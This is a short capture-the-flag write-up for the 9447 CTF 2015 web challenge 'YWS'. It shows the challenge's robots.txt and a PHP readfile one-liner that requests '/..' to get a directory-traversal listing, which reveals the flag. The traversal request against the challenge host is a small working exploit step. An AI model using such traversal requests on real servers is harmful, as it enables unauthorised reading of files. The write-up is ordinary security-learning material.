English [9447 CTF 2015] [Web 130 – YWS] Write Up


My friend wrote a cool web server. I’m sure he’s stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing


First we noticed the high quality theme with beautiful blinking images, but the best was this very nice song:

Most of us tried to navigate through the images directories:

There was a picture here, but it’s a WEB challenge, not a STEG one!
We decided to drop it, what a troll 🙁

Later we found a robots.txt file:

User-agnet: *
Disallow: /
Disallow: /..
Disallow: .
Disallow: ..
Disallow: /work
Disallow: /imegas/
Allow: /sounds/pljesus.wav

Disallow “/..” ? WTF!
Using PHP, we browsed the directory:

php -r "readfile('http://yws-fsiqc922.9447.plumbing/..');"
<title>Directory listing for /..</title>
<h2>Directory listing for /..</h2>
<li><a href="/../9447{D1rect0ries_ARe_h4rd}">9447{D1rect0ries_ARe_h4rd}</a>
<li><a href="/../.">.</a>
<li><a href="/../..">..</a>
<li><a href="/../gws">gws</a>
<li><a href="/../files">files</a>

Flag was : 9447{D1rect0ries_ARe_h4rd}.

Leave a Reply

Your email address will not be published. Required fields are marked *